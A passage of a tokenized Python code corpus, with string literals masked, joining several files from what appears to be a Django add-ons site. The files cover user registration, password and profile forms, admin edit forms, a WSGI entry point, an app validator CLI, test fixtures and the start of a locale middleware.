encoding import force_bytes <EOL> from django . utils . http import urlsafe_base64_encode <EOL> UserModel = get_user_model ( ) <EOL> email = self . cleaned_data [ "<STR_LIT:email>" ] <EOL> active_users = UserModel . _default_manager . filter ( <EOL> email__iexact = email , <EOL> deleted = False ) <EOL> for user in active_users : <EOL> if not user . has_usable_password ( ) : <EOL> continue <EOL> if not domain_override : <EOL> current_site = get_current_site ( request ) <EOL> site_name = current_site . name <EOL> domain = current_site . domain <EOL> else : <EOL> site_name = domain = domain_override <EOL> c = { <EOL> '<STR_LIT:email>' : user . email , <EOL> '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : site_name , <EOL> '<STR_LIT>' : urlsafe_base64_encode ( force_bytes ( user . pk ) ) , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : token_generator . make_token ( user ) , <EOL> '<STR_LIT>' : '<STR_LIT>' if use_https else '<STR_LIT:http>' , <EOL> } <EOL> subject = loader . render_to_string ( subject_template_name , c ) <EOL> subject = '<STR_LIT>' . join ( subject . splitlines ( ) ) <EOL> email = loader . render_to_string ( email_template_name , c ) <EOL> if html_email_template_name : <EOL> html_email = loader . render_to_string ( <EOL> html_email_template_name , c ) <EOL> else : <EOL> html_email = None <EOL> send_mail ( <EOL> subject , email , from_email , [ user . email ] , <EOL> html_message = html_email ) <EOL> class SetPasswordForm ( auth_forms . SetPasswordForm , PasswordMixin ) : <EOL> new_password1 = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( required = True ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( SetPasswordForm , self ) . __init__ ( * args , ** kwargs ) <EOL> def clean_new_password1 ( self ) : <EOL> return self . 
clean_password ( field = '<STR_LIT>' , instance = '<STR_LIT:user>' ) <EOL> def save ( self , ** kw ) : <EOL> amo . log ( amo . LOG . CHANGE_PASSWORD , user = self . user ) <EOL> log . info ( u'<STR_LIT>' % self . user ) <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = self . user . username , signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' ) <EOL> super ( SetPasswordForm , self ) . save ( ** kw ) <EOL> class UserDeleteForm ( forms . Form ) : <EOL> email = forms . CharField ( max_length = <NUM_LIT:255> , required = True , <EOL> widget = RequiredEmailInput ) <EOL> confirm = forms . BooleanField ( required = True , widget = RequiredCheckboxInput ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( UserDeleteForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:email>' ] . widget . attrs [ '<STR_LIT>' ] = ( <EOL> self . request . user . email ) <EOL> def clean_email ( self ) : <EOL> user_email = self . request . user . email <EOL> if not user_email == self . cleaned_data [ '<STR_LIT:email>' ] : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) . format ( <EOL> email = user_email ) ) <EOL> def clean ( self ) : <EOL> amouser = self . request . user <EOL> if amouser . is_developer : <EOL> log . warning ( u'<STR_LIT>' <EOL> % self . request . user ) <EOL> raise forms . ValidationError ( "<STR_LIT>" ) <EOL> class UsernameMixin : <EOL> def clean_username ( self ) : <EOL> name = self . cleaned_data [ '<STR_LIT:username>' ] <EOL> if not name : <EOL> if self . instance . has_anonymous_username ( ) : <EOL> name = self . instance . username <EOL> else : <EOL> name = self . instance . anonymize_username ( ) <EOL> if name . isdigit ( ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> slug_validator ( <EOL> name , lower = False , <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> if BlacklistedName . 
blocked ( name ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> if ( UserProfile . objects . exclude ( id = self . instance . id ) <EOL> . filter ( username__iexact = name ) . exists ( ) ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return name <EOL> class UserRegisterForm ( happyforms . ModelForm , UsernameMixin , PasswordMixin ) : <EOL> """<STR_LIT>""" <EOL> username = forms . CharField ( max_length = <NUM_LIT:50> , required = False ) <EOL> email = forms . EmailField ( widget = RequiredEmailInput ) <EOL> display_name = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:50> , <EOL> required = False ) <EOL> location = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> required = False ) <EOL> occupation = forms . CharField ( label = _lazy ( u'<STR_LIT>' ) , max_length = <NUM_LIT:100> , <EOL> required = False ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> password2 = forms . CharField ( max_length = <NUM_LIT:255> , <EOL> widget = PasswordMixin . widget ( render_value = False , <EOL> required = True ) ) <EOL> recaptcha = ReCaptchaField ( ) <EOL> homepage = HttpHttpsOnlyURLField ( label = _lazy ( u'<STR_LIT>' ) , required = False ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT:location>' , '<STR_LIT>' , <EOL> '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> instance = kwargs . get ( '<STR_LIT>' ) <EOL> if instance and instance . has_anonymous_username ( ) : <EOL> kwargs . 
setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> super ( UserRegisterForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if not settings . NOBOT_RECAPTCHA_PRIVATE_KEY : <EOL> del self . fields [ '<STR_LIT>' ] <EOL> errors = { '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) } <EOL> self . fields [ '<STR_LIT>' ] . error_messages = errors <EOL> def clean_email ( self ) : <EOL> d = self . cleaned_data [ '<STR_LIT:email>' ] . split ( '<STR_LIT:@>' ) [ - <NUM_LIT:1> ] <EOL> if BlacklistedEmailDomain . blocked ( d ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return self . cleaned_data [ '<STR_LIT:email>' ] <EOL> def clean_display_name ( self ) : <EOL> name = self . cleaned_data [ '<STR_LIT>' ] <EOL> if BlacklistedName . blocked ( name ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return name <EOL> def clean ( self ) : <EOL> super ( UserRegisterForm , self ) . clean ( ) <EOL> data = self . cleaned_data <EOL> p1 = data . get ( '<STR_LIT:password>' ) <EOL> p2 = data . get ( '<STR_LIT>' ) <EOL> if p1 and p1 != p2 : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = ErrorList ( [ msg ] ) <EOL> if p2 : <EOL> del data [ '<STR_LIT>' ] <EOL> return data <EOL> class UserEditForm ( UserRegisterForm , PasswordMixin ) : <EOL> oldpassword = forms . CharField ( <EOL> max_length = <NUM_LIT:255> , required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> password = forms . CharField ( max_length = <NUM_LIT:255> , required = False , <EOL> min_length = PasswordMixin . min_length , <EOL> error_messages = PasswordMixin . error_msg , <EOL> widget = PasswordMixin . widget ( render_value = False ) ) <EOL> password2 = forms . CharField ( max_length = <NUM_LIT:255> , required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> photo = forms . 
FileField ( label = _lazy ( u'<STR_LIT>' ) , required = False ) <EOL> notifications = forms . MultipleChoiceField ( <EOL> choices = [ ] , <EOL> widget = NotificationsSelectMultiple , <EOL> initial = email . NOTIFICATIONS_DEFAULT , <EOL> required = False ) <EOL> lang = forms . TypedChoiceField ( label = _lazy ( u'<STR_LIT>' ) , <EOL> choices = LOCALES ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( UserEditForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if not self . instance . lang and self . request : <EOL> self . initial [ '<STR_LIT>' ] = self . request . LANG <EOL> if self . instance : <EOL> default = dict ( ( i , n . default_checked ) for i , n <EOL> in email . NOTIFICATIONS_BY_ID . items ( ) ) <EOL> user = dict ( ( n . notification_id , n . enabled ) for n <EOL> in self . instance . notifications . all ( ) ) <EOL> default . update ( user ) <EOL> choices = email . NOTIFICATIONS_CHOICES <EOL> if not self . instance . is_developer : <EOL> choices = email . NOTIFICATIONS_CHOICES_NOT_DEV <EOL> if self . instance . fxa_migrated ( ) : <EOL> self . fields [ '<STR_LIT:email>' ] . required = False <EOL> self . fields [ '<STR_LIT:email>' ] . widget = forms . EmailInput ( <EOL> attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT:email>' ] . help_text = fxa_error_message ( <EOL> _ ( u'<STR_LIT>' <EOL> u'<STR_LIT>' ) ) <EOL> saved = self . instance . notifications . values_list ( '<STR_LIT>' , <EOL> flat = True ) <EOL> self . choices_status = { } <EOL> for idx , label in choices : <EOL> self . choices_status [ idx ] = idx not in saved <EOL> self . fields [ '<STR_LIT>' ] . choices = choices <EOL> self . fields [ '<STR_LIT>' ] . initial = [ i for i , v <EOL> in default . items ( ) if v ] <EOL> self . fields [ '<STR_LIT>' ] . widget . form_instance = self <EOL> if self . fields . get ( '<STR_LIT>' ) : <EOL> del self . 
fields [ '<STR_LIT>' ] <EOL> class Meta : <EOL> model = UserProfile <EOL> exclude = ( '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def clean ( self ) : <EOL> data = self . cleaned_data <EOL> amouser = self . request . user <EOL> p1 = data . get ( "<STR_LIT:password>" ) <EOL> p2 = data . get ( "<STR_LIT>" ) <EOL> if p1 or p2 : <EOL> if not amouser . check_password ( data [ "<STR_LIT>" ] ) : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> self . _errors [ "<STR_LIT>" ] = ErrorList ( [ msg ] ) <EOL> del data [ "<STR_LIT>" ] <EOL> super ( UserEditForm , self ) . clean ( ) <EOL> return data <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data . get ( '<STR_LIT:email>' ) <EOL> if self . instance . fxa_migrated ( ) : <EOL> if not email or email == self . instance . email : <EOL> return self . instance . email <EOL> else : <EOL> raise forms . ValidationError ( _ ( u'<STR_LIT>' ) ) <EOL> else : <EOL> return email <EOL> def clean_photo ( self ) : <EOL> photo = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not photo : <EOL> return <EOL> if photo . content_type not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> if photo . size > settings . MAX_PHOTO_UPLOAD_SIZE : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' % <EOL> ( settings . MAX_PHOTO_UPLOAD_SIZE / <NUM_LIT> / <NUM_LIT> - <NUM_LIT:1> ) ) ) <EOL> return photo <EOL> def clean_bio ( self ) : <EOL> bio = self . cleaned_data [ '<STR_LIT>' ] <EOL> normalized = clean_nl ( unicode ( bio ) ) <EOL> if has_links ( normalized ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return bio <EOL> def save ( self , log_for_developer = True ) : <EOL> u = super ( UserEditForm , self ) . save ( commit = False ) <EOL> data = self . cleaned_data <EOL> photo = data [ '<STR_LIT>' ] <EOL> if photo : <EOL> u . picture_type = '<STR_LIT>' <EOL> tmp_destination = u . picture_path + '<STR_LIT>' <EOL> with storage . 
open ( tmp_destination , '<STR_LIT:wb>' ) as fh : <EOL> for chunk in photo . chunks ( ) : <EOL> fh . write ( chunk ) <EOL> tasks . resize_photo . delay ( tmp_destination , u . picture_path , <EOL> set_modified_on = [ u ] ) <EOL> if data [ '<STR_LIT:password>' ] : <EOL> u . set_password ( data [ '<STR_LIT:password>' ] ) <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , username = u . username , <EOL> signature = '<STR_LIT>' , msg = '<STR_LIT>' ) <EOL> if log_for_developer : <EOL> amo . log ( amo . LOG . CHANGE_PASSWORD ) <EOL> log . info ( u'<STR_LIT>' % u ) <EOL> for ( i , n ) in email . NOTIFICATIONS_BY_ID . items ( ) : <EOL> enabled = n . mandatory or ( str ( i ) in data [ '<STR_LIT>' ] ) <EOL> UserNotification . update_or_create ( <EOL> user = u , notification_id = i , update = { '<STR_LIT>' : enabled } ) <EOL> log . debug ( u'<STR_LIT>' % u ) <EOL> u . save ( ) <EOL> return u <EOL> class BaseAdminUserEditForm ( object ) : <EOL> def changed_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( set ( self . changed_data ) - <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def changes ( self ) : <EOL> """<STR_LIT>""" <EOL> details = dict ( [ ( k , ( self . initial [ k ] , self . cleaned_data [ k ] ) ) <EOL> for k in self . changed_fields ( ) ] ) <EOL> if '<STR_LIT:password>' in self . changed_data : <EOL> details [ '<STR_LIT:password>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return details <EOL> def clean_anonymize ( self ) : <EOL> if ( self . cleaned_data [ '<STR_LIT>' ] and <EOL> self . changed_fields ( ) != set ( [ '<STR_LIT>' ] ) ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> class AdminUserEditForm ( BaseAdminUserEditForm , UserEditForm ) : <EOL> """<STR_LIT>""" <EOL> admin_log = forms . 
CharField ( required = True , label = '<STR_LIT>' , <EOL> widget = RequiredTextarea ( attrs = { '<STR_LIT>' : <NUM_LIT:4> } ) ) <EOL> confirmationcode = forms . CharField ( required = False , max_length = <NUM_LIT:255> , <EOL> label = '<STR_LIT>' ) <EOL> notes = forms . CharField ( required = False , label = '<STR_LIT>' , <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:4> } ) ) <EOL> anonymize = forms . BooleanField ( required = False ) <EOL> def save ( self , * args , ** kw ) : <EOL> profile = super ( AdminUserEditForm , self ) . save ( log_for_developer = False ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> amo . log ( amo . LOG . ADMIN_USER_ANONYMIZED , self . instance , <EOL> self . cleaned_data [ '<STR_LIT>' ] ) <EOL> profile . anonymize ( ) <EOL> else : <EOL> amo . log ( amo . LOG . ADMIN_USER_EDITED , self . instance , <EOL> self . cleaned_data [ '<STR_LIT>' ] , details = self . changes ( ) ) <EOL> log . info ( '<STR_LIT>' % <EOL> ( self . instance , self . changed_fields ( ) ) ) <EOL> if '<STR_LIT:password>' in self . changes ( ) : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = self . instance . username , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' , <EOL> cs1 = self . request . user . username , <EOL> cs1Label = '<STR_LIT>' ) <EOL> return profile <EOL> class BlacklistedNameAddForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> names = forms . CharField ( widget = forms . Textarea ( <EOL> attrs = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:16> } ) ) <EOL> def clean_names ( self ) : <EOL> names = self . cleaned_data [ '<STR_LIT>' ] . strip ( ) <EOL> if not names : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> names = os . linesep . join ( <EOL> [ s . strip ( ) for s in names . splitlines ( ) if s . strip ( ) ] ) <EOL> return names <EOL> class BlacklistedEmailDomainAddForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> domains = forms . 
CharField ( <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:16> } ) ) <EOL> def clean ( self ) : <EOL> super ( BlacklistedEmailDomainAddForm , self ) . clean ( ) <EOL> data = self . cleaned_data <EOL> if '<STR_LIT>' in data : <EOL> l = filter ( None , [ s . strip ( ) for s in data [ '<STR_LIT>' ] . splitlines ( ) ] ) <EOL> data [ '<STR_LIT>' ] = os . linesep . join ( l ) <EOL> if not data . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> msg = '<STR_LIT>' <EOL> self . _errors [ '<STR_LIT>' ] = ErrorList ( [ msg ] ) <EOL> return data </s>
<s> import os <EOL> import logging <EOL> import sys <EOL> from datetime import datetime <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> wsgi_loaded = datetime . now ( ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> import django <EOL> import django . conf <EOL> from django . core . wsgi import get_wsgi_application <EOL> import django . core . management <EOL> import django . utils <EOL> django . setup ( ) <EOL> django . utils . translation . activate ( django . conf . settings . LANGUAGE_CODE ) <EOL> utility = django . core . management . ManagementUtility ( ) <EOL> command = utility . fetch_command ( '<STR_LIT>' ) <EOL> command . validate ( ) <EOL> django_app = get_wsgi_application ( ) <EOL> def application ( env , start_response ) : <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = wsgi_loaded <EOL> env [ '<STR_LIT>' ] = django . conf . settings . HOSTNAME <EOL> env [ '<STR_LIT>' ] = str ( datetime . now ( ) ) <EOL> return django_app ( env , start_response ) <EOL> newrelic_ini = getattr ( django . conf . settings , '<STR_LIT>' , None ) <EOL> if newrelic_ini : <EOL> import newrelic . agent <EOL> try : <EOL> newrelic . agent . initialize ( newrelic_ini ) <EOL> except Exception : <EOL> log . exception ( '<STR_LIT>' ) <EOL> application = newrelic . agent . wsgi_application ( ) ( application ) </s>
<s> import sys <EOL> import argparse <EOL> import requests <EOL> from . import validate_app , validate_packaged_app <EOL> def main ( ) : <EOL> "<STR_LIT>" <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT:text>" , <EOL> choices = ( "<STR_LIT:text>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" , <EOL> required = False ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = """<STR_LIT>""" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = """<STR_LIT>""" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> try : <EOL> timeout = int ( args . timeout ) <EOL> except ValueError : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if "<STR_LIT>" in args . package : <EOL> error_bundle = validate_app ( <EOL> requests . get ( args . package ) . content , listed = not args . unlisted , <EOL> format = None , url = args . package , acorn = args . acorn ) <EOL> elif args . package . endswith ( "<STR_LIT>" ) : <EOL> with open ( args . package ) as f : <EOL> error_bundle = validate_app ( <EOL> f . read ( ) , listed = not args . unlisted , format = None , <EOL> acorn = args . acorn ) <EOL> else : <EOL> error_bundle = validate_packaged_app ( <EOL> args . package , listed = not args . unlisted , format = None , <EOL> timeout = timeout , acorn = args . acorn ) <EOL> if args . 
output == "<STR_LIT:text>" : <EOL> print error_bundle . print_summary ( <EOL> verbose = args . verbose , no_color = args . boring ) . encode ( "<STR_LIT:utf-8>" ) <EOL> elif args . output == "<STR_LIT>" : <EOL> sys . stdout . write ( error_bundle . render_json ( ) ) <EOL> if error_bundle . failed ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import json <EOL> import unicodehelper <EOL> from . specs . webapps import WebappSpec <EOL> def detect_webapp ( err , package ) : <EOL> """<STR_LIT>""" <EOL> with open ( package , mode = "<STR_LIT:r>" ) as f : <EOL> detect_webapp_string ( err , f . read ( ) ) <EOL> def detect_webapp_string ( err , data ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> u_data = unicodehelper . decode ( data ) <EOL> webapp = json . loads ( u_data ) <EOL> except ValueError as exc : <EOL> err . error ( <EOL> err_id = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> error = "<STR_LIT>" , <EOL> description = [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> unicode ( exc ) ] ) <EOL> else : <EOL> ws = WebappSpec ( webapp , err ) <EOL> ws . validate ( ) <EOL> def long_name_warning ( appendix = None ) : <EOL> if appendix : <EOL> appendix = [ appendix ] <EOL> else : <EOL> appendix = [ ] <EOL> err . warning ( <EOL> err_id = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> warning = "<STR_LIT>" , <EOL> description = [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] + appendix ) <EOL> def test_name ( locale , appendix = None ) : <EOL> if not isinstance ( locale , dict ) : <EOL> return <EOL> name = locale . get ( "<STR_LIT:name>" ) <EOL> if name and isinstance ( name , ( str , unicode ) ) and len ( name ) > <NUM_LIT:12> : <EOL> long_name_warning ( appendix ) <EOL> test_name ( webapp ) <EOL> locales = webapp . get ( "<STR_LIT>" ) <EOL> if locales and isinstance ( locales , dict ) : <EOL> for locale in locales : <EOL> test_name ( locales [ locale ] , '<STR_LIT>' % locale ) <EOL> if not err . failed ( fail_on_warnings = False ) : <EOL> err . save_resource ( "<STR_LIT>" , webapp ) <EOL> return webapp </s>
<s> from js_helper import TestCase <EOL> class TestFunctionTraversal ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_function_declaration_order ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:bar>" , "<STR_LIT>" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> def test_function_expression_order ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:bar>" , "<STR_LIT>" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> def test_nested_functions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) </s>
<s> def in_ ( l , a , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if a not in l : <EOL> raise AssertionError ( msg or "<STR_LIT>" % ( a , l ) ) </s>
<s> import random <EOL> from string import letters <EOL> from django . contrib . auth import get_user_model <EOL> from django . test import TestCase <EOL> try : <EOL> from django . test import override_settings <EOL> except ImportError : <EOL> from django . test . utils import override_settings <EOL> from tidings . models import Watch , WatchFilter <EOL> def user ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT:password>' : <EOL> '<STR_LIT>' } <EOL> if '<STR_LIT:username>' not in kwargs : <EOL> defaults [ '<STR_LIT:username>' ] = '<STR_LIT>' . join ( random . choice ( letters ) <EOL> for x in xrange ( <NUM_LIT:15> ) ) <EOL> defaults . update ( kwargs ) <EOL> u = get_user_model ( ) ( ** defaults ) <EOL> if save : <EOL> u . save ( ) <EOL> return u <EOL> def watch ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT:user>' : kwargs . get ( '<STR_LIT:user>' ) or user ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> defaults . update ( kwargs ) <EOL> w = Watch . objects . create ( ** defaults ) <EOL> if save : <EOL> w . save ( ) <EOL> return w <EOL> def watch_filter ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) or watch ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:value>' : <NUM_LIT> } <EOL> defaults . update ( kwargs ) <EOL> f = WatchFilter . objects . create ( ** defaults ) <EOL> if save : <EOL> f . save ( ) <EOL> return f </s>
<s> from elasticutils . contrib . django import MappingType , Indexable <EOL> _model_cache = [ ] <EOL> def reset_model_cache ( ) : <EOL> del _model_cache [ <NUM_LIT:0> : ] <EOL> class Meta ( object ) : <EOL> def __init__ ( self , db_table ) : <EOL> self . db_table = db_table <EOL> class SearchQuerySet ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> self . steps = [ ] <EOL> def get ( self , pk ) : <EOL> pk = int ( pk ) <EOL> return [ m for m in _model_cache if m . id == pk ] [ <NUM_LIT:0> ] <EOL> def filter ( self , id__in = None ) : <EOL> self . steps . append ( ( '<STR_LIT>' , id__in ) ) <EOL> return self <EOL> def order_by ( self , * fields ) : <EOL> self . steps . append ( ( '<STR_LIT>' , fields ) ) <EOL> return self <EOL> def values_list ( self , * args , ** kwargs ) : <EOL> self . steps . append ( ( '<STR_LIT>' , args , kwargs . pop ( '<STR_LIT>' , False ) ) ) <EOL> return self <EOL> def __iter__ ( self ) : <EOL> order_by = None <EOL> values_list = None <EOL> objs = _model_cache <EOL> for mem in self . steps : <EOL> if mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> objs = [ obj for obj in objs if obj . id in mem [ <NUM_LIT:1> ] ] <EOL> elif mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> order_by_field = mem [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> elif mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> values_list = ( mem [ <NUM_LIT:1> ] , mem [ <NUM_LIT:2> ] ) <EOL> if order_by : <EOL> objs . sort ( key = getattr ( obj , order_by_field ) ) <EOL> if values_list : <EOL> objs = [ obj . id for obj in objs ] <EOL> return iter ( objs ) <EOL> class Manager ( object ) : <EOL> def get_query_set ( self ) : <EOL> return SearchQuerySet ( self ) <EOL> def get ( self , pk ) : <EOL> return self . get_query_set ( ) . get ( pk ) <EOL> def filter ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . filter ( * args , ** kwargs ) <EOL> def order_by ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . 
order_by ( * args , ** kwargs ) <EOL> def values_list ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . values_list ( * args , ** kwargs ) <EOL> class FakeModel ( object ) : <EOL> _meta = Meta ( '<STR_LIT>' ) <EOL> objects = Manager ( ) <EOL> def __init__ ( self , ** kw ) : <EOL> self . _doc = kw <EOL> for key in kw : <EOL> setattr ( self , key , kw [ key ] ) <EOL> _model_cache . append ( self ) <EOL> class FakeDjangoMappingType ( MappingType , Indexable ) : <EOL> @ classmethod <EOL> def get_model ( cls ) : <EOL> return FakeModel <EOL> @ classmethod <EOL> def extract_document ( cls , obj_id , obj = None ) : <EOL> if obj is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return obj . _doc </s>
<s> """<STR_LIT>""" <EOL> import urllib <EOL> from warnings import warn <EOL> from django . conf import settings <EOL> from django . http import HttpResponsePermanentRedirect <EOL> from django . utils . encoding import smart_str <EOL> import tower <EOL> from . import urlresolvers <EOL> from . helpers import urlparams <EOL> class LocaleURLMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> if not settings . USE_I18N or not settings . USE_L10N : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . exempt_urls = getattr ( settings , '<STR_LIT>' , ( ) ) <EOL> def _is_lang_change ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in request . GET : <EOL> return False <EOL> return not any ( request . path . endswith ( url ) for url in self . exempt_urls ) <EOL> def process_request ( self , request ) : <EOL> prefixer = urlresolvers . Prefixer ( request ) <EOL> urlresolvers . set_url_prefix ( prefixer ) <EOL> full_path = prefixer . fix ( prefixer . shortened_path ) <EOL> if self . _is_lang_change ( request ) : <EOL> prefixer . locale = '<STR_LIT>' <EOL> new_path = prefixer . fix ( prefixer . shortened_path ) <EOL> query = dict ( ( smart_str ( k ) , request . GET [ k ] ) for k in request . GET ) <EOL> query . pop ( '<STR_LIT>' ) 